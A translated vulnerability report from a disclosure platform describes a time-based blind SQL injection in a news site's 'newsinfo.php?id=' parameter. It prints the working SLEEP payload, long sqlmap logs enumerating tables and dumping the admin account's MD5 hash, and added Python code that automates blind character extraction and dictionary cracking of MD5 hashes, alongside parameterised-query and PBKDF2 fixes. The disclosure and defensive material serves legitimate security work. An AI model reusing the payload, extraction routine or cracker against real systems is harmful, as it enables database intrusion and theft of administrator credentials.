WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-16: Details reported to the vendor, awaiting vendor handling. 2015-12-18: Vendor confirmed; details disclosed to the vendor only. 2015-12-28: Details disclosed to core white hats and relevant domain experts. 2016-01-07: Details disclosed to regular white hats. 2016-01-17: Details disclosed to intern white hats. 2016-01-28: Details disclosed to the public.
Ugh. Just to dump the admin, sqlmap ran from 4 pm yesterday until this morning, and the most annoying thing about time-based injection is that after all that the hash still won't crack. Admin, why on earth did you set such a hard password?
Isn't it pretty? Official site address:
Injection point:
**.**.**.**/newsinfo.php?id=18&catid=1
A simple "and 1=1" / "and 1=2" test gave different responses, so I threw it straight into sqlmap.
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=18) AND SLEEP(5) AND (1892=1892&catid=1
---
[18:27:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[18:27:01] [INFO] fetching current user
[18:27:01] [INFO] retrieved:
[18:27:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[18:27:17] [INFO] adjusting time delay to 4 seconds due to good response times
tsaochee_maindb@localhost
current user: 'tsaochee_maindb@localhost'

[18:46:32] [WARNING] increasing time delay to 4 seconds
aochee_maindb
available databases [1]:
[*] tsaochee_maindb
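The two steps above, the "and 1=1" / "and 1=2" differential probe and the blind extraction that sqlmap then automated with the "id=18) AND SLEEP(5) AND (1892=1892" payload, as an added worked example. This is not code from the report or from the affected site. It assumes the shape of the query behind newsinfo.php (both GET parameters concatenated inside one parenthesised WHERE clause, which is what the payload's closing and opening parentheses imply), stands in an in-memory SQLite database for the MySQL backend, and uses row-present/row-absent as the oracle because SQLite has no SLEEP(); the per-character bisection is the same whether the signal is a missing row or a five-second delay. Table and column names mirror the report (st_admin_user, account, password); the hash, the news row and all function names are hypothetical.

```python
import hashlib
import sqlite3

# Constructed stand-in data: one news row and one admin row shaped like the
# report's st_admin_user table. The hash is md5 of a throwaway password.
SEED_HASH = hashlib.md5(b"throwaway-secret").hexdigest()


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE st_news (id INTEGER, catid INTEGER, title TEXT)")
    conn.execute("INSERT INTO st_news VALUES (18, 1, 'some news item')")
    conn.execute("CREATE TABLE st_admin_user (id INTEGER, account TEXT, password TEXT)")
    conn.execute("INSERT INTO st_admin_user VALUES (1, 'admin', ?)", (SEED_HASH,))
    return conn


def newsinfo_vulnerable(conn, id_param, catid_param):
    """Assumed shape of newsinfo.php: raw GET values concatenated into a
    parenthesised WHERE clause. With id = '18) AND SLEEP(5) AND (1892=1892'
    this becomes WHERE (id=18) AND SLEEP(5) AND (1892=1892 AND catid=1)."""
    sql = (f"SELECT title FROM st_news "
           f"WHERE (id={id_param} AND catid={catid_param})")
    return conn.execute(sql).fetchall()


def newsinfo_fixed(conn, id_param, catid_param):
    """Same query with bound parameters; non-numeric input never reaches SQL."""
    sql = "SELECT title FROM st_news WHERE (id=? AND catid=?)"
    return conn.execute(sql, (int(id_param), int(catid_param))).fetchall()


def differential_check(conn, query=newsinfo_vulnerable):
    """The report's first probe: a different response for 'and 1=1' versus
    'and 1=2' means the parameter is evaluated by the database."""
    true_page = query(conn, "18 and 1=1", "1")
    false_page = query(conn, "18 and 1=2", "1")
    return true_page != false_page


def make_oracle(conn):
    """Returns oracle(cond) -> bool, wrapping cond in the payload shape the
    report's sqlmap run used. The report measured response time (AND SLEEP(5));
    here the signal is whether the news row comes back."""
    def oracle(cond):
        return bool(newsinfo_vulnerable(conn, f"18) AND ({cond}) AND (1", "1"))
    return oracle


def extract_string(oracle, subquery, max_len=64):
    """Blind extraction by bisection, the way sqlmap's blind techniques work:
    about 7 oracle queries per character instead of one per candidate byte.
    One extra query per position checks that the string is long enough."""
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:  # smallest code point c with char <= c
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1)) <= {mid}"):
                hi = mid
            else:
                lo = mid + 1
        out.append(chr(lo))
    return "".join(out)


def dump_admin_hash(conn):
    return extract_string(
        make_oracle(conn),
        "SELECT password FROM st_admin_user WHERE account='admin'")


def fix_blocks_payload(conn):
    """The parameterised endpoint rejects the payload before any SQL runs."""
    try:
        newsinfo_fixed(conn, "18) AND (1=1) AND (1", "1")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("injectable:", differential_check(db))
    print("admin hash:", dump_admin_hash(db))
    print("fixed endpoint rejects payload:", fix_blocks_payload(db))
```

Against a real time-based target the oracle is the only part that changes: send the request with AND SLEEP(n) folded into the condition and treat an elapsed time above the baseline as True, which is also why sqlmap kept "adjusting time delay" in the log above, since network jitter turns a single mistimed response into a wrong character ("invalid character detected. retrying..").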
39 tables. Time-based blind injection is too slow, so I went straight for the important tables.
[18:52:59] [INFO] retrieved:
[18:53:11] [INFO] adjusting time delay to 4 seconds due to good response times
39
[18:53:33] [INFO] retrieved: st_address
[18:57:27] [ERROR] invalid character detected. retrying..
[18:57:27] [WARNING] increasing time delay to 5 seconds
_area
[18:59:23] [INFO] retrieved: st_address_city
[19:02:12] [INFO] retrieved: st_admin_group
[19:06:59] [INFO] retrieved: st_admin_menu
[19:09:51] [INFO] retrieved: st_admin_menulist
[19:13:10] [ERROR] invalid character detected. retrying..
[19:13:10] [WARNING] increasing time delay to 6 seconds
[19:13:14] [INFO] retrieved: st_admin_permisions
[19:19:44] [ERROR] invalid character detected. retrying..
[19:19:44] [WARNING] increasing time delay to 7 seconds
[19:19:48] [INFO] retrieved: st_admin_user
[19:23:14] [INFO] retrieved: st_album_cat
[19:28:24] [ERROR] invalid character detected. retrying..
[19:28:24] [WARNING] increasing time delay to 8 seconds
[19:28:29] [INFO] retrieved: st_al
st_admin_user
Database: tsaochee_maindb
[39 tables]
+----------------------+
| `st_interview\x03`   |
| st_address_area      |
| st_address_city      |
| st_admin_group       |
| st_admin_menu        |
| st_admin_menulist    |
| st_admin_permisions  |
| st_admin_user        |
| st_album_cat         |
| st_album_cat_list    |
| st_album_pic         |
| st_appli             |
| st_application       |
| st_application2      |
| st_application3      |
| st_article           |
| st_article_cat       |
| st_banner            |
| st_banner_cat        |
| st_carewin           |
| st_classes           |
| st_classes_datelistH |
| st_event_cat         |
| st_event_cat_list    |
| st_index_about       |
| st_life              |
| st_mail_tpl          |
| st_member            |
| st_news              |
| st_news_cat          |
| st_pdt_banner        |
| st_product           |
| st_product_cat       |
| st_service           |
| st_share             |
| st_site_basic        |
| st_site_global       |
| st_site_meta         |
| st_suuermqn          |
+----------------------+
Damn, stayed up this late just for the admin password.
se 'tsaochee_maindb'
[00:13:49] [INFO] resumed: 1
[00:13:49] [INFO] retrieved:
[00:13:52] [INFO] retrieved:
[00:13:56] [INFO] retrieved: admin
[00:14:55] [INFO] retrieved: 0
[00:15:12] [INFO] retrieved: 1
[00:15:24] [INFO] retrieved:
[00:15:27] [INFO] retrieved: 0
[00:15:45] [INFO] retrieved:
[00:15:48] [INFO] retrieved: admin
[00:16:47] [INFO] retrieved: 0
[00:17:04] [INFO] retrieved: 0
[00:17:24] [ERROR] invalid character detected. retrying..
[00:17:24] [WARNING] increasing time delay to 3 seconds
9f735a0e7134c506098cc2929
[00:23:36] [ERROR] invalid character detected. retrying..
[00:23:36] [WARNING] increasing time delay to 4 seconds
75d249
[00:25:27] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[00:28:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\sqlmap\sqlmap\Bin\txt\wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[00:28:47] [INFO] using default dictionary
[00:28:47] [INFO] loading dictionary from 'E:\sqlmap\sqlmap\Bin\txt\wordli'
do you want to use common password suffixes? (slow!) [y/N] y
[00:28:51] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:28:51] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[00:29:13] [INFO] using suffix '1'
[00:29:18] [INFO] current status: a1soh... /
[1 entry]
+------------+-------------+---------+---------+----+---------+-----------+-----------+----------+--------+----------------------------------+
| `\x7ftime` | `lastlo?in` | account | groupid | id | jmail   | loadlevel | logincode | nickname | online | password                         |
+------------+-------------+---------+---------+----+---------+-----------+-----------+----------+--------+----------------------------------+
| <blank>    | <blank>     | admin   | 0       | 1  | <blank> | 0         | <blank>   | admin    | 0      | 09f735a0e7134c506098cc292975d249 |
+------------+-------------+---------+---------+----+---------+-----------+-----------+----------+--------+----------------------------------+
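The cracking step sqlmap ran above (generic MD5 recognised in the 'password' column, default wordlist, "common password suffixes" mangling) as an added example, alongside what the application should have stored instead. This is not the report's or sqlmap's code: the wordlist and suffix list are tiny constructed stand-ins for sqlmap's bundled lists, the target hashes are computed in the block from throwaway passwords rather than taken from the report, and the storage scheme (PBKDF2-HMAC-SHA256 with a random per-user salt) is the editor's choice of a baseline, not anything the vendor used.

```python
import hashlib
import hmac
import itertools
import secrets

# Constructed wordlist and suffix list. sqlmap's wordlist.txt and suffix
# list are far larger; the mangling below is the same idea at toy scale.
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty"]
SUFFIXES = ["", "1", "12", "123", "2015", "!"]


def looks_like_md5(s):
    """The recognition rule behind 'recognized possible password hashes':
    a generic unsalted MD5 is 32 hex characters."""
    return len(s) == 32 and all(c in "0123456789abcdefABCDEF" for c in s)


def candidates(words, suffixes):
    """Every base word, plain and capitalised, combined with every suffix."""
    for word, suffix in itertools.product(words, suffixes):
        yield word + suffix
        if word[0].isalpha():
            yield word.capitalize() + suffix


def crack_md5(target_hex, words=WORDLIST, suffixes=SUFFIXES):
    """Dictionary attack on an unsalted MD5 hash. Returns (plaintext or None,
    number of candidates hashed). Unsalted MD5 costs one fast hash per guess,
    which is why a wordlist password falls in milliseconds."""
    if not looks_like_md5(target_hex):
        return None, 0
    target = target_hex.lower()
    tried = 0
    for cand in candidates(words, suffixes):
        tried += 1
        if hashlib.md5(cand.encode()).hexdigest() == target:
            return cand, tried
    return None, tried


# Hypothetical replacement for the st_admin_user.password column: a salted,
# iterated hash, so each guess costs the attacker `iterations` HMAC calls and
# precomputed tables are useless.
def hash_password(password, salt=None, iterations=200_000):
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    recomputed = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iters))
    # constant-time comparison so verification leaks nothing via timing
    return hmac.compare_digest(recomputed.hex(), digest_hex)


if __name__ == "__main__":
    weak = hashlib.md5(b"Admin2015").hexdigest()   # constructed, not the report's hash
    print("md5 cracked:", crack_md5(weak))
    stored = hash_password("Admin2015")
    print("pbkdf2 record:", stored)
    print("verify ok:", verify_password("Admin2015", stored))
```

The report's own hash resisting both sqlmap's wordlist and the community is the good case for the site owner, but only by accident of one strong password: with unsalted MD5, every other account in st_admin_user whose password appears in a wordlist is a few seconds of work once the column is read.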
Asked around the community; nobody could crack it either.
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-12-18 13:51
Thanks for the report.
None yet.